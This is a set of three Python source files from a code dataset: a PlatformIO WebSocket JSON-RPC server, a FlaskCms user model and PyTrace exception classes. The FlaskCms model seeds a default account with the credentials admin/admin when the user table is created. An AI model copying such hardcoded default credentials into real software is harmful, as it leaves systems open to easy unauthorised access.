# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# pylint: disable=import-error
import click
import jsonrpc
from autobahn.twisted.websocket import WebSocketServerFactory, WebSocketServerProtocol
from jsonrpc.exceptions import JSONRPCDispatchException
from twisted.internet import defer, reactor
from platformio.compat import PY2, dump_json_to_unicode, is_bytes
class JSONRPCServerProtocol(WebSocketServerProtocol):
    """WebSocket protocol serving JSON-RPC requests via the factory dispatcher."""

    def onOpen(self):
        # A client connected: cancel any pending auto-shutdown timer.
        self.factory.connection_nums += 1
        if self.factory.shutdown_timer:
            self.factory.shutdown_timer.cancel()
            self.factory.shutdown_timer = None

    def onClose(self, wasClean, code, reason):  # pylint: disable=unused-argument
        # Last client gone: re-arm the idle auto-shutdown timer.
        self.factory.connection_nums -= 1
        if self.factory.connection_nums == 0:
            self.factory.shutdownByTimeout()

    def onMessage(self, payload, isBinary):  # pylint: disable=unused-argument
        # click.echo("> %s" % payload)
        # Dispatch the JSON-RPC payload to the registered handlers.
        response = jsonrpc.JSONRPCResponseManager.handle(
            payload, self.factory.dispatcher
        ).data
        # if error
        if "result" not in response:
            self.sendJSONResponse(response)
            return None
        # The handler may have produced a Deferred; resolve it first.
        d = defer.maybeDeferred(lambda: response["result"])
        d.addCallback(self._callback, response)
        d.addErrback(self._errback, response)
        return None

    def _callback(self, result, response):
        # Success path: substitute the resolved value and reply.
        response["result"] = result
        self.sendJSONResponse(response)

    def _errback(self, failure, response):
        # Failure path: convert the Twisted failure into a JSON-RPC error.
        if isinstance(failure.value, JSONRPCDispatchException):
            e = failure.value
        else:
            e = JSONRPCDispatchException(code=4999, message=failure.getErrorMessage())
        del response["result"]
        response["error"] = e.error._data  # pylint: disable=protected-access
        self.sendJSONResponse(response)

    def sendJSONResponse(self, response):
        # click.echo("< %s" % response)
        if "error" in response:
            click.secho("Error: %s" % response["error"], fg="red", err=True)
        # Serialize to unicode JSON, then to bytes for the wire on Python 3.
        response = dump_json_to_unicode(response)
        if not PY2 and not is_bytes(response):
            response = response.encode("utf-8")
        self.sendMessage(response)
class JSONRPCServerFactory(WebSocketServerFactory):
    """WebSocket factory tracking connections and optional idle auto-shutdown."""

    protocol = JSONRPCServerProtocol
    # Number of currently open WebSocket connections.
    connection_nums = 0
    # Pending reactor.callLater handle (0/None when not armed).
    shutdown_timer = 0

    def __init__(self, shutdown_timeout=0):
        super(JSONRPCServerFactory, self).__init__()
        self.shutdown_timeout = shutdown_timeout
        self.dispatcher = jsonrpc.Dispatcher()

    def shutdownByTimeout(self):
        # A timeout below 1 disables auto-shutdown entirely.
        if self.shutdown_timeout < 1:
            return

        def _auto_shutdown_server():
            click.echo("Automatically shutdown server on timeout")
            reactor.stop()

        self.shutdown_timer = reactor.callLater(
            self.shutdown_timeout, _auto_shutdown_server
        )

    def addHandler(self, handler, namespace):
        # Expose handler methods as "<namespace>.<method>" JSON-RPC names.
        self.dispatcher.build_method_map(handler, prefix="%s." % namespace)
| platformio/platformio | platformio/commands/home/rpc/server.py | Python | apache-2.0 | 3,610 |
#!/usr/bin/env python
# coding=utf-8
from flaskcms.lib import db
from flask.ext.sqlalchemy import event
from passlib.apps import mysql_context as pwd_context
class User(db.Model):
    """Account record used for authentication (Flask-Login compatible)."""

    # BUG FIX: the original spelled this ``__tablename`` (missing trailing
    # underscores).  Python name-mangles that to ``_User__tablename`` and
    # SQLAlchemy silently ignores it; the canonical attribute for an
    # explicit table name is ``__tablename__``.
    __tablename__ = "user"
    id = db.Column(db.Integer, primary_key=True)
    name = db.Column(db.String(10))
    passwd = db.Column(db.String(41))
    post = db.relationship('Post', backref='user', lazy='dynamic')

    def __init__(self, name, passwd):
        """Create a user with *name* and an already-hashed *passwd*."""
        self.name = name
        self.passwd = passwd

    def is_authenticated(self):
        """Return True if the user is authenticated (has a database id)."""
        return bool(self.id)

    def is_active(self):
        """True, as all users are active."""
        return True

    def is_anonymous(self):
        """False, as anonymous users aren't supported."""
        return False

    def get_id(self):
        # Flask-Login expects an id it can str(); the raw primary key is
        # returned here, matching the original behavior.
        return self.id
# Seed a default "admin" account right after the user table is created.
def insert_default(target, connection, **kw):
    """``after_create`` hook: insert the default admin/admin credentials."""
    admin = User("admin", pwd_context.encrypt("admin"))
    db.session.add(admin)
    db.session.commit()
event.listen(User.__table__, 'after_create', insert_default)
| Franciscowxp/FlaskCms | flaskcms/modules/account/model.py | Python | mit | 1,196 |
"""
Global PyTrace exception classes.
"""
class ImproperlyConfigured(Exception):
    """Raised when PyTrace is somehow improperly configured."""
class StandardInputReadError(Exception):
    """
    Raised when attempted to read from Standard Input Stream
    while Input Queue is empty
    """

    # Fixed typo in the user-facing message: "Steam" -> "Stream".
    MESSAGE = "Unable to read from Standard Input Stream"

    def __init__(self, prompt):
        """Store the *prompt* that was being shown when the read failed."""
        super(StandardInputReadError, self).__init__(self.MESSAGE)
        self.prompt = prompt
class StandardInputEvalError(Exception):
    """
    Raised by `UserInputReader` when in evaluation mode and user input
    contains error
    """
    def __init__(self, real_exception=None):
        # Derive the message from whatever was handed in: a SyntaxError
        # (copying its location details onto this instance), a plain
        # string, or nothing at all (msg stays None).
        msg = None
        if isinstance(real_exception, SyntaxError):
            msg = real_exception.msg
            self.filename = real_exception.filename
            self.lineno = real_exception.lineno
            self.message = real_exception.message
            self.offset = real_exception.offset
        elif isinstance(real_exception, (str, unicode)):  # noqa: F821 -- Python 2 builtin
            msg = real_exception
        super(StandardInputEvalError, self).__init__(msg)
class StandardInputError(Exception):
    """
    Wrapper around an exception raised by `exec` in `UserInputReader` when
    in evaluation mode
    """

    def __init__(self, inner_exception):
        """Keep the wrapped exception; reuse its text as our message."""
        self.inner_exception = inner_exception
        super(StandardInputError, self).__init__(str(inner_exception))
class UnsafeImportError(Exception):
    """
    Raised when attempted to import module that is not marked as safe within
    sandbox
    """

    message_format = "%s is not allowed to be imported in current environment"

    def __init__(self, module, *args):
        """Build the error message from the offending *module* name."""
        super(UnsafeImportError, self).__init__(
            self.message_format % module, *args
        )
class NoSerializerFoundError(Exception):
    """
    Raised by `pytrace.serializers` when no suitable serializer is
    found for serialization
    """

    def __init__(self, value_type, *args):
        """Report that *value_type* has no registered serializer."""
        super(NoSerializerFoundError, self).__init__(
            "No type serializer found for {0}".format(value_type), *args
        )
class SerializationError(Exception):
    """
    Raised by `pytrace.serializers` when failed to encode specified value due
    to internal serializer error
    """

    def __init__(self, encoder, value, *args):
        """Remember the failing *encoder*/*value* pair for diagnostics."""
        self.encoder = encoder
        self.value = value
        super(SerializationError, self).__init__(
            "Failed to serialize {0} using {1}".format(value, encoder), *args
        )
| uadnan/pytrace | pytrace/core/exceptions.py | Python | mit | 2,561 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.